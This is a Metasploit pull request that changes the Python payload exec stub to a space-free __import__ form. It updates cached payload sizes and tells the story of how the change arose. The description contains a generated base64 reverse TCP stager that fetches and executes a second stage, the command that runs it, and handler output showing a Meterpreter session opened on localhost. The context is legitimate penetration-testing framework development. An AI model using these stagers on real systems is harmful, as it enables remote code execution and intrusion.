### PR TITLE
Added Python stager format without a space

### DIFF
--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -15,7 +15,7 @@ module Msf::Payload::Python
   def py_create_exec_stub(cmd)
     # Base64 encoding is required in order to handle Python's formatting
 
-    b64_stub = "exec(__import__('base64').b64decode('#{ Rex::Text.encode_base64(cmd)}'))"
+    b64_stub = "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('#{ Rex::Text.encode_base64(cmd)}')[0]))"
     b64_stub
 
   end

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -14,12 +14,10 @@ module Msf::Payload::Python
   #
   def py_create_exec_stub(cmd)
     # Base64 encoding is required in order to handle Python's formatting
-    # requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
+
+    b64_stub = "exec(__import__('base64').b64decode('#{ Rex::Text.encode_base64(cmd)}'))"
     b64_stub
+
   end
 
 end

--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71962
+  CachedSize = 71945
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71930
+  CachedSize = 71913
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71930
+  CachedSize = 71913
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 
 module MetasploitModule
 
-  CachedSize = 71862
+  CachedSize = 71845
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 386
+  CachedSize = 369
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 486
+  CachedSize = 469
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_http.rb
+++ b/modules/payloads/stagers/python/reverse_http.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_http'
 
 module MetasploitModule
 
-  CachedSize = 526
+  CachedSize = 509
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_http'
 
 module MetasploitModule
 
-  CachedSize = 794
+  CachedSize = 777
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 454
+  CachedSize = 437
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl'
 
 module MetasploitModule
 
-  CachedSize = 470
+  CachedSize = 453
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcpSsl

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 558
+  CachedSize = 541
 
   include Msf::Payload::Stager
   include Msf::Payload::Python


### PR DESCRIPTION
Hi,

TL;DR This PR changes python dropper format and uses `__import__` in order to get rid of space on the import.

This PR has an interesting story 👀 Let me share the story with you guys. 

I do live streams about security research on Twitch. Metasploit is quite popular among security researches in Turkey like rest of the world. In order to encourage local security community in Turkey to contribute back to the MSF, a week ago, I started doing a live stream about "Metasploit Development Series" on Twitch ! Reaction from the community was quite unexpected. We have done 10 hours of msf development stream so far with a more than total 5,500 viewers ! 

Having that much of people on your side, you always find an opportunity to learn some new tricks. Yesterday night, I was doing a stream in order to talk about exploitation tricks of #13094 ! I was talking about a white space within the dropper and how it cause a problem for exploitation in our case. 

To be honest, this is not the first time that I've faced with this issue. 3 years ago, I had to use same trick -using perl wrapper like generic_sh encoder does- on #8540 !

One of the viewers ( I guess he's @hasantayyar ), who has knowledge with python, told me that it's possible to get rid of the white-space by using `__import__` during stream!

![spaceless_python](https://user-images.githubusercontent.com/4004716/79462423-1fcb6480-8000-11ea-95b8-5490cd8f49b6.png)

After the stream, another viewer, @0xF61, , came up with a very clean version of python dropper by using `__import__` mention by **hasantayyar**.


## TEST

I've tested that version of python dropper with both python2 and python3. It works very well.

```
➜  metasploit-framework git:(spaceless_py_payload) ./msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444                        
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 384 bytes
exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNy4wLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='))
```

Both test with py2 and py3.

```
➜  metasploit-framework git:(spaceless_py_payload) pyenv shell 2.7.14
➜  metasploit-framework git:(spaceless_py_payload) python -V         
Python 2.7.14
➜  metasploit-framework git:(spaceless_py_payload) python -c "exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNy4wLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='))"
➜  metasploit-framework git:(spaceless_py_payload) 
```

Classic MSF Handler  with python payload.

```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (53755 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49400) at 2020-04-16 16:08:08 +0300

meterpreter >
```


I wanted to share the story behind of that PR in order to mention original contributors !

All the credits of this PR belong to these two genius guys. 

Thanks !
